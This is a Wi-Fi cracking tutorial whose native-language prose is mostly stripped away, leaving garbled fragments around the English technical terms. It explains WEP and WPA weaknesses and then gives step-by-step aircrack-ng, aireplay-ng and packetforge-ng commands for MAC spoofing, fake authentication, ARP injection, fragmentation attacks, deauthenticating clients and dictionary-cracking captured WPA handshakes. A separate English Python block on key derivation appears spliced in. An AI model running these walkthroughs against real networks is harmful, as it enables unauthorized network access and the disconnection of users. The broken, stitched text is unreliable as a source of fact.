
, Wi-Fi

Hacker , ,
, , Update server client.
patch critical , exploits , advisories
. , data loss.
' Hacker Cracker ,
Root Admin , ban

ADMHN


0_. qubix
1. 802.1
1.1. 802.1
1.2.
2.
2.1.
2.2.
a) symmetric key cryptography
b) hash algorithms
c) asymmetric key cryptography
3.
4. To WEP
4.1. ' WEP
4.2. WEP
4.3. WEP;
a) authentication
b) integrity protection
c) IVs
5. The empire strikes back - To WPA
5.1. WPA / WEP
5.2. 4-way handshake
6. WPA2 total recall
7.
7.1.Deauthentication
7.2.Fake authentication
7.3.Interactive packet replay
7.4.ARP request replay
7.5.KoreK chopchop
7.6.Fragmentation attack
7.7.Caffe-latte attack
8. hardware
8.1.aircrack-ng suite
8.2.kismet
8.3.wireshark
8.4.cowpatty
8.5.john the ripper
8.6.backtrack
8.7. hardware
9. WEP cracking
10.WEP cracking revisited
11. ...
12. WPA cracking
12.1. Recon Kismet
12.2. Passive Attack
12.3. Active Attack
12.4. Four-way Handshake
12.5. Crack
12.6. Crack
13. ...
14.

0_. qubix
3 :
- ,
copy paste *
-To crackers
wifi
*) , !

1. 802.1
802.1;
802.1 802.1 .
(authentication)

(supplicant) o , authenticator
( access point - AP) authentication server ( RADIUS server) .
To 802.1, wireless ,
supplicant authentication server. authenticator
, wireless access points
/ . servers, APs ,
. Access Point authentication server.
802.1 , EAP
(Extensible Authentication Protocol)
, PPP(Point-to-Point Protocol - DSL
authentication PPPoE -PPPover Ethernet-) LAN PoL (EAP
over LAN) EAP-TLS, PEAP, Kerberos V5
802.1 .


, 802.11 legacy 1997
.
2.4Ghz ( 900hz
GSM) data rate 1 2 Mbit/s .
2.4Ghz , 1999 802.11a
5Ghz, data rate
54bit/s. 5Ghz
2.4Ghz, ,
802.11a .
T 802.11b, data
rate 11bit/s. H data rate
(modulation - DSSS).
, wireless ,

(2.4Ghz) bluetooth, ,
2003, 802.11g 2.4Ghz
802.11a. 54bit/s data rate
hardware 802.11b 802.11a
21%. data rate, hardware
3 (dual-band -2.4 & 5Ghz, tri-mode -802.11a &
802.11b/g).

2.4Ghz, .11b
2004 802.11i wireless ,
WEP, , WPA.
(c-f, h, j) .
802.11n, MIMO
(Multiple In-Multiple Out), , 2,3 4
, data streams
. 600bit/s bitrate
2.4 5Ghz 802.11a/g (OFD - Orthogonal
frequency-division multiplexing).

2.

(plaintext cleartext)
(cipher)
(key) ,
.
(ciphertext).


2 , (symmetric-key cryptography)
(public-key cryptography).
Symmetric-key cryptography

.

, block ciphers stream ciphers.


block ciphers plaintext, key
ciphertext . plaintext
plaintext ,
ciphertext .
(modes of operation). block
ciphers DES (data encryption standard) AES (advanced encryption standard).
stream ciphers (keystream)
plaintext bit-by-bit , ciphertext

, ,
cipher plaintext. stream cipher RC4,
SSL, RDP, SASL, Kerberos, TLS WEP WPA.
hash, plaintext
plaintext .
hash MD5 SHA.
public-key cryptography ( asymmetric-key)
symmetric-key ,
, key ciphertext
.
.
public-key keys, private
ciphertext public plaintext.
,
. asymmetric key DSA, RSA, ElGamal o
PGP OpenPGP.

public-key (digital signature)


( mail) , private key
( hash ) ,
public key
.
SSL/TLS, VPNs.

3.
,
...
AP (Access Point), Wi-Fi

Ad Hoc (Mode)
, AP
ARP (Address Resolution Protocol), IP MAC.
Association
( authentication)

Authentication (supplicant),
.
Authenticator
( AP).
Beacon AP
ESSID, MAC address
BSSID (Basic Service Set Identifier), MAC access point.
CCMP (Counter-Mode / Cipher Block Chaining Message Authentication Code Protocol),
WPA2, AES block cipher.
Channel , 1hz 5Mhz
Wi-Fi .
CRC (Cyclic Redundancy Check), pseudo-integrity
.
Dictionary ( xP) bruteforce attack
Dynamic WEP WEP : broadcast key
( shared key ) session key authenticated
supplicant. .
EAP (Extensible Authentication Protocol),
authentication.
EAPOL (EAP Over LAN), EAP .
ESSID (Extended Service Set Identifier),
Fragmentation
.
Frame frame packet. O
layer 2 OSI model frames,
3 layer packets ( OSI model )
GEK (Group Encryption Key), multicast traffic (
-integrity- CCMP).
GIK (Group Integrity Key), multicast traffic (TKIP).
GMK (Group Master Key), group key hierarchy.
GTK (Group Transient Key), GMK.
Handshake - supplicant
ICV (Integrity Check Value), data field plaintext
( CRC32 ).
Infrastructure (Mode) AP
.
IP address (Internet Protocol address)
.
IV (Initialization Vector), encryption key
keystream.
KCK (Key Confirmation Key), handshake.
KEK (Key Encryption Key), handshake .
MAC address (Media Access Control address), 48-bit
.
MIC (Message Integrity Code), data field plaintext
( Michael).
MK (Master Key), supplicant authenticator
authentication 802.1x.
Monitor Mode wifi
wifi . raw mode.
MPDU (Mac Protocol Data Unit), fragmentation.
MSDU (Mac Service Data Unit), fragmentation.
PAE (Port Access Entity), 802.1x.
packet () ()
. ,
"" .

PMK (Pairwise Master Key), pairwise key.


PRGA (Pseudo Random Generation Algorithm) keystream RC4.
ciphertext plaintext = PRGA
PSK (Pre-Shared Key), (passphrase) PMK
WPA-PSK mode.
PTK (Pairwise Transient Key), PMK.
Rainbow tables hashes bruteforce/dictionary attacks
RSN (Robust Security Network), 802.11i (TKIP, CCMP etc.).
RSNA (Robust Security Network Association), RSN,
4-way handshake.
RSN IE (Robust Security Network Information Element), RSN
Probe Response Association Request.
Sniffing
Spoofing attacker .
mac spoofing mac address client, arp spoofing

SSID (Service Set Identifier), wireless network identifier ( ES-SID).
STA (Station), .
TK (Temporary Key), unicast traffic (
-integrity checking- CCMP).
TKIP (Temporal Key Integrity Protocol), WPA
RC4 ( WEP).
TMK (Temporary MIC Key), data integrity unicast traffic (TKIP).
TSC (TKIP Sequence Counter), replay counter TKIP.
TSN (Transitional Security Network), -802.11i (WEP .).
WEP (Wired Equivalent Privacy), default 802.11
.
Wi-Fi (Wireless Fidelity),
WPA (Wireless Protected Access), 802.11i ,
TKIP.
WRAP (Wireless Robust Authenticated Protocol),
WPA2.

4. WEP
' WEP
To WEP wireless 1999.
RC4 CRC32 integrity checking.
, ,
40-bit ,
104-bit . WEP
WPA/WPA2,
. , routers .

WEP
-
WEP . 24-bit IV key (K)
RC4 plaintext (P) checksum
(ICV), ciphertext (C):

C = [ P || ICV(P) ] ⊕ [ RC4(K || IV) ]

⊕ : XOR, || : concatenation, R : keystream RC4(K || IV)


, :

plaintext , RC4 keystream


IV shared key. To XOR plaintext
ICV ( CRC32 plaintext) ciphertext
IV key ID frame.
(header) plaintext bssid, IV
destination address. To , ICV, LLC o subnetwork
access protocol header.

802.11 header | BSS ID | Initialization vector (IV) | Destination address   (unencrypted)
Logical Link Control | Subnetwork Access Protocol Header | Data | Integrity Check Value   (encrypted)

Authentication

WEP authentication (open authentication


method) (shared key authentication).
, supplicant AP
, . association
authenticator. association, WEP .
(four-way handshake) :
1. client authentication request P
2. To AP plaintext (challenge)
3. O client plaintext challenge WEP key
authentication request
4. To AP plaintext challenge .

association, .
2
capture four-way handshake WEP key , .

WEP;
Authentication ()

, supplicant AP,
.
key.
attacker
.
client P,
attacker, client, mac address .
key (
key AP),
client ( )
key. AP.
H .
WEP: C = P ⊕ R, ⊕ XOR, C
ciphertext, P plaintext ICV (P || ICV(P)) R
keystream key IV RC4 (RC4(key || IV)). C
P, R = C ⊕ P; R C, P = C ⊕ R. O
IVs WEP IV client,
attacker, o R .

Integrity protection
To 2001 Borisov, Goldberg Wagner CRC CRC
bit-flipping attack. O CRC ICV plaintext,
.
ICV plaintext ,
. CRC
, XOR.
: CRC(X ⊕ Y) = CRC(X) ⊕ CRC(Y).
(flip) bits plaintext
ICV (forged packet), P
router.
WEP
. WEP
, ! WEP ...
. , , bit-flipping,
.

IVs
stream cipher plaintext
(keystream) . WEP IVs.
IV (24bits) IVs 17.
IV
. AP 11Mbps 1500 ,
IVs 5 :

(1,500 bytes × 8 bits/byte × 2^24) / (11 × 10^6 bits/sec) = 18,300 secs ≈ 5h
5 , IVs keystreams.
,
IVs ,
IVs. shared key,
keystreams .
,
keystream.
H WEP RC4 cipher. To 2001 Fluhrer, Mantin
Shamir (FMS attack) Key Scheduling algorithm
PRGA (keystream) XOR plaintext.
, RC4 keystreams bytes
bits shared key . keystreams
OR shared key IVs, IVs (weak IVs). ,
weak IV , attacker bits shared key bytes . M
IV, shared key.

5. The empire strikes back WPA


WPA / WEP
WEP , Wi-Fi alliance
, Wireless Protected Access. To WPA
, TKIP
CCMP WPA2.
O TKIP (2003) 802.11i (2004)
WEP. key
IV , IV 48bits 24.
key attacks byte plaintext byte key IV,
WEP byte plaintext byte key XOR
. , ICV CRC32,
64bit (C) . replay attacks,
(TSC) .
TKIP hardware WEP
drivers firmware updates, RC4 stream cipher
ICV .
authentication server (aka WPA-enterprise),
WPA-PSK. RADIUS authentication servers,
router , PSK mode.

, chopchop
WPA protected , , key
bruteforce dictionary based attacks 4-way handshake.
4-way handshake
WPA. To 802.11i RSN
4-way handshake supplicant authenticator, RSNA.
4 RSN(A) :

802.1X

RSN(A) &
4-way handshake ( 3 bullet 2
authentication server) :
PMK (*)
PTK
cipher
GTK

*) WPA-PSK mode, PMK = PSK.

H PTK :
PTK = PRF-X (PMK, "Pairwise key expansion", Min(AP_Mac, STA_Mac) || Max(AP_Mac, STA_Mac)
|| Min(ANonce, SNonce) || Max(ANonce, SNonce))

.. :
PRF-X: Pseudo Random Function
Anonce: AP
SNonce: o
STA_mac,AP_mac: mac addresses AP
PTK KCK (Key Confirmation Key), KEK
(Key Encryption Key) TK (Temporary Key). KCK MIC.
H PTK, , .
RSN ,
, WEP.
, 4-way handshake.

6. WPA2 total recall


WPA2 WEP. TKIP,
CCMP, AES block cipher, RC4
. ' ,
802.11i standard,
.
WPA, WPA2 , authentication server (WPA2
enterprise) pre-shared key (WPA2-PSK).

7.
Deauthentication
deauthentication clients
(reauthenticate).
clients DoS (Queensland DoS).
:

(hidden cloaked) AP, AP broadcast ESSID .


WPA/WPA2 handshakes clients reauthentication
ARP
MAC address spoofing

Fake authentication
clients associated
MAC address. WEP association
AP. ARP AP WPA/WPA2.

Interactive packet replay/package injection


O AP IV
. , (inject)
P , IV .
, AP,
.
(natural),
1) broadcast MAC address (FF:FF:FF:FF:FF:FF) - ARP
2) wireless client , DS (distribution system) bit 1
,
(package forgery).

ARP request replay/ARP Injection


IVs AP. ,
package injection .
ARP .
AP , IV. To
attacker AP , IV .
, WEP key.

KoreK chopchop
, WEP
key, WEP key, plaintext PRGA
.
:
1)
2) byte (chop off)
3) 0,
4) AP
5) byte 1
256 ,

AP
6) byte

KoreK bit-flipping CRC32
ICV chopped off ICV
.

Fragmentation attack
1500 bytes PRGA,
injection attacks. ,
PRGA ,
PRGA .
fragmentation attack ( AP,
relay) .


, 8 bytes
802.11 LLC/SNAP header. 3 bytes
: AA, AA, 03 frame (
frame ). 3 bytes 00,00,00 IP
2 bytes. 2 bytes , IP ARP.
byte 08, IP ARP
, ARP 36 54 bits.
:
byte.

0xAA     0xAA     0x03     0x00     0x00     0x00     0x08     ??
--DSAP-- --SSAP-- --CTRL-- -------ORG code-------- ---Ether type---

, C = P ⊕ R 8 bytes ( 8 bytes plaintext)
8 ciphered bytes , XOR
8 bytes R (= PRGA)! .
,

P ,
. To (fragmentation) ( 802.11
) WEP MAC layer*. 802.11 specification,
MAC layer 16 4bytes
keystream.
8 bytes PRGA (
4 ),
IP 28 bytes (8 bytes LLC/SNAP
header + 20 bytes IP header) ICV .
4 bytes, fragment
WEP 4 × 16 = 64 bytes (- 28 )
.
36 bytes . 1500 bytes PRGA
fragmentation.
*) sublayer data-link layer OSI network model


ARP
. ARP
. ..1500bytes
P . ,
ARP .
bytes .
. IV ,
bit-flipping
WEP ...

Caffe-latte attack
attacker P
. caffe-latte , laptop
, cached WEP keys
attacker !
SSID spoofing evil twin/honeypot attacks
AP
clients wi-fi hotspots . attacker
AP ESSID connex
laptop WEP key man-in-the-middle
. attacker WEP key
. , ;
ARP pc
ip address. client ,
ip address .
ip . attacker
ARP requests . ARP
bit-flipping integrity checking WEP, P
MAC address header gratuitous ARP ,
ARP request .
o attacker , ARP
request, ip - -
. attacker WEP key.

8. hardware
X software
Aircrack-ng suite
wifi crackers, ,
mass deauthentication. :

aireplay-ng
, wifi
package injection.

:
aireplay-ng <options> <replay interface>

Filter options:

-b bssid : MAC address, Access Point


-d dmac : MAC address, Destination ()
-s smac : MAC address, Source ()


-m len    :
-n len    :
-u type   : frame control, type field
-v subt   : frame control, subtype field
-t tods   : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep  : frame control, WEP bit

package injection

-x nbpps  : number of packets per second
-p fctrl  : frame control word (hex)
-a bssid  : Access Point MAC address
-c dmac   : Destination MAC address
-h smac   : Source MAC address
-e essid  : fakeauth attack : AP SSID authentication
-j        : arpreplay attack : inject FromDS
-g value  : ring buffer (default: 8)
-k IP     : destination IP in fragments
-l IP     : source IP in fragments
-o npckts : number of packets per burst (-1)
-q sec    : keep-alives, dynamic wep (-1)
-y prga   : keystream shared key authentication

Attack modes, aireplay ( ):

--deauth count : deauthenticate 1 stations (-0)
--fakeauth delay : fake authentication AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : keystream (-5)
--test : injection test (-9)

:
aireplay -1 0 -e [ Essid ] -a [ Bssid AP] -b [ bssid AP] -h [ bssid station ] [ interface ]
-1 = fakeauth
0 = delay AP
-e = AP authentication
-a = mac AP injection
-b = mac P
-h = mac
interface = wlan interface , ath0

airmon-ng
airmon monitor mode

:
airmon-ng <start|stop> <interface> [channel]
:

<start|stop> start stop interface. ()


<interface> interface. ()
[channel] .


airodump-ng
airodump raw . ,
AP GPS,

:
airodump-ng <options> <interface>[,<interface>,...]
:
--ivs            : IVs
--gpsd           : GPSd
--write <prefix> : prefix
-w               : --write
--beacons        : beacons dump file
--update <secs>  : secs
--showack        : ack/cts/rts
-h               : stations --showack
-f <msecs>       : channel ms
--berlin <secs>  : AP/client (Default: 120 seconds).

-r <file>        : file
Filter options:
--encrypt <suite>   : APs cipher
--netmask <netmask> : APs mask
--bssid <bssid>     : APs BSSID
-a                  : unassociated clients

' airodump-ng 2.4Ghz.


/ :
--channel <channels> :
--band <abg>         : airodump-ng
--cswitch <method>   :
        0 : FIFO (default)
        1 : Round Robin
        2 : Hop on last
-s                   : --cswitch
--help

aircrack-ng
aircrack cracking WEP WPA/WPA2-PSK keys.
WEP , PTW (Pyshkin, Tews, Weinmann) FMS/KoreK.
PTW
Andreas Klein (2005) o
RC4 keystreams Key FMS. ARP
.
FMS/KoreK WEP key:

FMS ( Fluhrer, Mantin, Shamir) attacks - statistical techniques


Korek attacks - statistical techniques
brute force

WPA/WPA2 .
WPA/WPA2 shared key 4-way handshake client
AP dictionary attack handshake .

:
aircrack-ng [options] <capture file(s)>

Options:
-a <amode> : Force attack mode (1 = static WEP, 2 = WPA/WPA2-PSK).
-e <essid> : If set, all IVs from networks with the same ESSID will be used. This option is also required
             for WPA/WPA2-PSK cracking if the ESSID is not broadcasted (hidden).
-b <bssid> : Select the target network based on the access point's MAC address.
-p <nbcpu> : On SMP systems: # of CPU to use. This option is invalid on non-SMP systems.
-q         : Enable quiet mode (no status output until the key is found, or not).
-c         : (WEP) Restrict the search space to alpha-numeric characters only (0x20 - 0x7F).
-t         : (WEP) Restrict the search space to binary coded decimal hex characters.
-h         : (WEP) Restrict the search space to numeric characters (0x30 - 0x39). These keys are used by
             default in most Fritz!BOXes.
-d <start> : (WEP) Set the beginning of the WEP key (in hex), for debugging purposes.
-m <maddr> : (WEP) MAC address to filter WEP data packets. Alternatively, specify -m ff:ff:ff:ff:ff:ff to
             use all and every IVs, regardless of the network.
-n <nbits> : (WEP) Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The
             default value is 128.
-i <index> : (WEP) Only keep the IVs that have this key index (1 to 4). The default behaviour is to
             ignore the key index.
-f <fudge> : (WEP) By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP.
             Specify a higher value to increase the bruteforce level: cracking will take more time, but
             with a higher likelihood of success.
-k <korek> : (WEP) There are 17 korek statistical attacks. Sometimes one attack creates a huge false
             positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k
             17 to disable each attack selectively.
-x/-x0     : (WEP) Disable last keybytes bruteforce.
-x1        : (WEP) Enable last keybyte bruteforcing (default).
-x2        : (WEP) Enable last two keybytes bruteforcing.
-X         : (WEP) Disable bruteforce multithreading (SMP only).
-y         : (WEP) This is an experimental single bruteforce attack which should only be used when the
             standard attack mode fails with more than one million IVs.
-w <words> : (WPA) Path to a wordlist or "-" without the quotes for standard in (stdin).
-z         : Invokes the PTW WEP cracking method.

aircrack:
KB = Keybyte
depth =
byte = byte key IVs
vote = byte

:
aircrack-ng -w h:hex.txt,ascii.txt -a 1 -n 64 -e apname wep10-01.cap
(wep dictionary attack)

-w h:hex.txt,ascii.txt = dictionaries ( h:
hex values)
-a 1 = WEP
-n 64 = 64bit
-e apname = AP (-b mac address )
wep10-01.cap =

packetforge-ng
O packetforge
injection. ARP requests,
UDP, ICMP custom . ARP request injection.
Forge options:
-p <fctrl> : set frame control word (hex)
-a <bssid> : set Access Point MAC address
-c <dmac> : set Destination MAC address
-h <smac> : set Source MAC address
-j : set FromDS bit
-o : clear ToDS bit
-e : disables WEP encryption
-k <ip[:port]> : set Destination IP [Port]
-l <ip[:port]> : set Source IP [Port] (Dash lowercase letter L)
-t ttl : set Time To Live
-w <file> : write packet to this pcap file
Modes (long modes use double dashes):
arp : forge an ARP packet (-0)
udp : forge an UDP packet (-1)
icmp : forge an ICMP packet (-2)
null : build a null packet (-3)
custom : build a custom packet (-9)

Kismet
Kismet (sniffing), intrusion
detection 802.11 wireless .
:

Wireshark/Tcpdump
Airsnort weak-iv packets
IP
channel hopping multicard split channel hopping
SSID

Client/Server client kismet server
/ APs clients
AP default
WEP packets realtime
Named pipe Snort
, Kismet instance
instances (remote drones)
XML output
20

, Kismet , , ,
APs clients .
, (channel hopping)
. ,
GPS.

server/drone/client , drones , server


clients .
Unix, Linux, Mac Os X (KisMAC), *BSDs windoze ( )
:

Wardriving: Mobile detection of wireless networks, logging and mapping of network location, WEP,
etc.
Site survey: Monitoring and graphing signal strength and location.
Distributed IDS: Multiple Remote Drone sniffers distributed throughout an installation monitored by a
single server, possibly combined with a layer3 IDS like Snort.
Rogue AP Detection: Stationary or mobile sniffers to enforce site policy against rogue access points.

Kismet :
Interface:
- Name : SSID
- T : T
- W :
- Ch : AP
- Packts :
- Flags : IP (. A4 ARP )
- IP Range : IP
- Size : AP
:
W Y (Yes) WEP,
O (Other) (WPA/TKIP/LEAP/EAP/TLS). O ,
(Information) Encrypt
.
:
Kismet , .
:
- :
- : , factory default
- :
- :
:
- A Access Point
- H (Ad-Hoc) - ad-hoc point-to-point wireless
- P (Probe request) client ,
- D (Data) - Data network
- T (Turbocell) - Turbocell network
- G (Group) - Group ( )
:
e popup kismet servers

z - Zoom
m ( config)
t
g
u group

c popup clients
n group
i
s
l - signal/power/noise
r
a
p
f
w alerts warnings.

Wireshark
To wireshark ( ethereal)
, . ,
Pcap / . monitor mode (
promiscuous mode ethernet)
:
Windows, Linux, OS X, Solaris, FreeBSD, NetBSD

Live ( format)
Gui cli (TTY-mode TShark)
VoIP
capture formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure
IDS iplog, Microsoft Network Monitor, Network General Sniffer, Sniffer Pro, and NetXray, Network
Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer,
Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets
EtherPeek/TokenPeek/AiroPeek, .
/ Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth,
USB, Token Ring, Frame Relay, FDDI
IPsec, ISAKMP, Kerberos, SNMPv3,
SSL/TLS, WEP WPA/WPA2

Output XML, PostScript, CSV

wireshark iv packets, EAPOL


WPA handshakes, QoS packets, ARPs
:
http://www.wireshark.org

coWPAtty
To coWPAtty bruteforce dictionary attack,
WPA/WPA2 handshakes.
Usage: cowpatty [options]
-f : Dictionary file
-r : Packet capture file
-s : Network SSID
-h : Print this help information and exit
-v : Print verbose information (more -v for more verbosity)
-V : Print program version and exit


John the ripper


password cracking . 15(!!) ,
. DES,
MD5, Blowfish, Kerberos AFS, WinNT/2000/XP LM hashes. plugins MD4, LDAP
passwords, mysql .
dictionary/bruteforce attacks.
rules ,
0, i 1, a @ . coWPAtty output
dictionary JtR rules dictionary:
john --wordlist=all.lst --rules --stdout | cowpatty -r wpapsk.dump -s "linksys" -f -

: http://www.openwall.com/john/

BackTrack
To BackTrack live Linux, Slackware
penetration testing ( 300).
patched drivers , -
.
:

http://www.remote-exploit.org/backtrack.html
documentation:

http://wiki.remote-exploit.org

hardware
aircrack-ng . , wireless
chips :
chipset                  driver
atheros                  madwifi
Broadcom                 bcm43xx / b43 / b43
Centrino a/b/g           ipw2915/3945 (ipw2915 uses ipw2200 driver)
Centrino a/g/n (5xxx)    4965AGN
Prism2/3                 HostAP/wlan-ng
PrismGT FullMAC          prism54
Ralink                   Rt2x00, RT2570USB, rt2500, rt2570, rt61, rt73, RT73USB
RTL8185                  mac80211
RTL8187B/RTL8197         RTL8187
RTL8187L                 Rtl8187, rtl8187b
TI (ACX100/ACX111)       ACX100/ACX111


drivers patching.
atheros chip SMC-EZconnect & Ezconnect2, Level One wc-0300, Netgear WAG511, D-Link DWL-G550,
Thinkpad 11a/b/g
:

http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

9.WEP cracking
Injection attack
,
, WEP key
. chip atheros.
1) monitor mode [1]

modprobe ath_pci
modprobe ipwraw
2) mac address ( interface)

iwconfig
airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:66 wifi0
3) interface monitor mode

airmon-ng start wifi0


4) APs

airodump-ng ath0
P :
ESSID: connex
mac: 00:21:21:21:21:21
channel: 6
5)

airodump-ng -c 6 -w network.out --bssid 00:21:21:21:21:21 ath0


-c = AP
-w = (network.out prefix ,
network.out-01, -02, -03 )
--bssid = mac AP
ath0 = wireless interface
6) fake association AP, (*)

aireplay-ng -1 0 -a 00:21:21:21:21:21 -h 00:11:22:33:44:66 -e connex ath0


:Association successful :-)
-1 = fake authentication (0 = delay AP)
-a = mac AP


-h = mac
-e = essid P
ath0 = interface
7) AP

aireplay-ng -3 -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0


-3 = arp replay attack
-b = mac AP
-h = macchanger
ath0 = wireless interface
, :

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0


AP
-2 = interactive packet replay
-p 0841 = Frame Control
wireless client
-c = destination mac address broadcast
AP, IV !
-b = mac AP
-h = macchanger
8) WEP key

aircrack-ng -n 128 -b 00:21:21:21:21:21 network.out-01.cap


-n 128 = WEP
-b = mac AP
network.out-01.cap = (5)
*) ( ) AP,
client . 6 7
.

10.WEP cracking revisited


Fragmentation attack
clients
fragmentation attack. O PRGA
ARP request access point
, .

1) APs
airodump-ng ath0

AP channel = 7

2) monitor mode 7
airmon-ng stop ath0
airmon-ng start wifi0 7

3) association AP
aireplay-ng -1 0 -e [ AP] -a [mac P] -h [mac ] ath0

-1 = Fake authentication AP
-e = essid ( AP)
-a = Mac address AP (bssid)
-h = mac address (source)
* Atheros chipsets MAC address

4) keystream aireplay-ng
aireplay-ng -5 -b [mac AP] -h [mac ] ath0

-5 = fragment: keystream
-b = AP mac address (bssid)
-h = mac address (source)
ath0 = wireless interface extension
5) ARP request packetforge-ng
packetforge-ng -0 -a [mac AP] -h [mac ] -k 255.255.255.255 -l
255.255.255.255 -y fragment-0206-131211.xor -w arp-request

-0 = ARP
-a = bssid
-h = mac
-k = set Destination IP
-l = set Source IP
-y = PRGA ( (4) )
-w = pcap
6) airodump-ng
airodump-ng -c 7 --bssid [mac AP] -w wep ath0

-c = AP
--bssid = mac AP
-w = date
ath0 = wireless interface extension

7) inject
aireplay-ng -2 -r arp-request ath0

-2 = interactive frame selection (injection)


-r = ( (5) )


8) WEP key
aircrack-ng -P 2 -b 00:18:F6:AC:11:13 wep*.cap

-P = PTW debug mode


2 = PTW (Pyshkin/Tews/Weinmann)
-b = bssid AP

11. ...
traffic
, IVs .
injection AP
.

MAC Address filtering


injection, fake authentication AP ,
mac address clients mac addresses
.
airodump clients mac
, AP. client
deauthentication .
-m aircrack mac address

IVs,
keys
: -k N ( =1..17) -y. (. Aircrack )
fudge factor (-f) . default 2 ,
,
.

,
AP :P

12.WPA cracking
, , kismet
reconing, wireshark packet filtering, coWPAtty JtR dictionary attacks.
:
http://www.smallnetbuilder.com/content/view/30278/98/1/1/

...
!

Recon Kismet
Kismet (Backtrack > Radio Network Analysis > 80211 > Analyzer). H version 3
wizard wireless interface ( ).

,
/usr/local/etc/kismet.conf interface:
:
/usr/local/etc/kismet.conf -- Line 25:source=madwifing_g,wifi0,kis0

Kismet :
bt ~ # kismet
kismet , .
raw packets,
PSK, client AP.
interface.
.
kismet, h help menu
.
, ,
, default . W : None
("W"), WEP ("Y"), WPA ("O" Other). H Ch AP.
Packts Kismet AP.
.
clients AP,
handshake .
kismet autofit mode,
. highlight
enter. .
encryption scheme, BSSID clients AP.
c kismet clients.
clients Established ("E") To DS ("T") ( T ).

Passive Attack
, kismet,
, , kismet
. airodump-ng, kismet
, .
four-way handshake, airodump-ng ,
.
passive WPA-PSK attack :

Kismet
(: channel, "s" "c")
(highlight AP "L")
handshake

Active Attack
Kismet,
associated clients AP .
, deauthentication packets,

. four-way
handshake.
. association
( )
AP ,
monitor mode.
- VAP (Virtual Access Point):
airmon-ng stop ath0 ( atheros)

- , monitor mode
airmon-ng start wifi0

deauthentication client authentication


. terminal windows.
airodump-ng
handshake ( kismet):
:
airodump-ng -w capture_file_prefix --channel channel_number interface

:
airodump-ng -w cap --channel 6 ath0

terminal deauthentication attack aireplay-ng:


:
aireplay-ng --deauth 1 -a MAC_of_AP -c MAC_of_client interface

:
aireplay-ng --deauth 1 -a 00:18:E7:02:4C:E6 -c 00:13:CE:21:54:14 ath0

, client AP ()
(reauthentication). Kismet
deauthentication floods,
, , .
, airodump-ng
reauthentication event.

Four-way Handshake
authentication handshake,
Wireshark,
WPA handshake.
Wireshark (Backtrack > Privilege Escalation > Sniffers)
Kismet (Kismet-<date>.dump). H WPA four-way handshake Extensible Authentication
Protocol over LAN (EAPoL). Wireshark EAPoL ,

eapol [filter].
, client-AP-client-AP. handshake,
.

Crack
Wi-Fi Alliance WPA-PSK.
() bruteforce attacks,
...6 ( 948
6 1015). pc 35 hashes ,
...5 hash table 8 .
.
. hash (salted) SSID AP, hash
table 5 , APs
SSID. WPA key bruteforce ...
, passphrases
, hashes
. dictionary attack.
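To make the SSID-salting point concrete, an added example (not the article's or any tool's code) that derives the PMK from passphrase and SSID as WPA-PSK does, then the PTK with the PRF formula of section 5.2. The nonces are constructed, the MAC addresses are the ones from the aireplay example earlier on the page, and the PMK check uses the published test vector passphrase "password" with SSID "IEEE".

```python
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # The SSID is the salt, so a precomputed PMK table is only good for one SSID.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbits: int) -> bytes:
    # 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ...
    # concatenated and truncated to n bits.
    out = b""
    i = 0
    while len(out) * 8 < nbits:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[: nbits // 8]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
               anonce: bytes, snonce: bytes) -> dict:
    # PTK = PRF-X(PMK, "Pairwise key expansion",
    #             Min(AP_Mac, STA_Mac) || Max(AP_Mac, STA_Mac) ||
    #             Min(ANonce, SNonce) || Max(ANonce, SNonce))
    # Min/Max compare raw bytes, so AP and station derive the same PTK
    # whichever side is "first".
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = prf(pmk, b"Pairwise key expansion", data, 512)  # 512 bits for TKIP; CCMP uses the first 384
    return {
        "KCK": ptk[0:16],   # Key Confirmation Key: keys the MIC on the handshake messages
        "KEK": ptk[16:32],  # Key Encryption Key: wraps the GTK sent in message 3
        "TK": ptk[32:48],   # Temporal Key: unicast data encryption
        "TMK": ptk[48:64],  # TKIP-only Michael MIC keys
    }


def demo() -> dict:
    # MAC addresses taken from the aireplay example on this page; nonces constructed.
    ap_mac = bytes.fromhex("0018e7024ce6")
    sta_mac = bytes.fromhex("0013ce215414")
    anonce = hashlib.sha256(b"constructed ANonce").digest()
    snonce = hashlib.sha256(b"constructed SNonce").digest()
    pmk = derive_pmk("password", "IEEE")
    pmk_other_ssid = derive_pmk("password", "IEEE2")  # same passphrase, different SSID
    ptk_ap = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)
    ptk_sta = derive_ptk(pmk, sta_mac, ap_mac, snonce, anonce)  # station's argument order
    return {
        "pmk_hex": pmk.hex(),
        "same_pmk_other_ssid": pmk == pmk_other_ssid,
        "both_sides_agree": ptk_ap == ptk_sta,
        "ptk": ptk_ap,
    }
```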
To BackTrack 2 , , ,
, ( passwords ).
Backtrack ,
.
, dictionary attack
WPA handshake aircrack-ng, coWPAtty. aircrack-ng .
coWPAtty hashes .
aircrack-ng attack

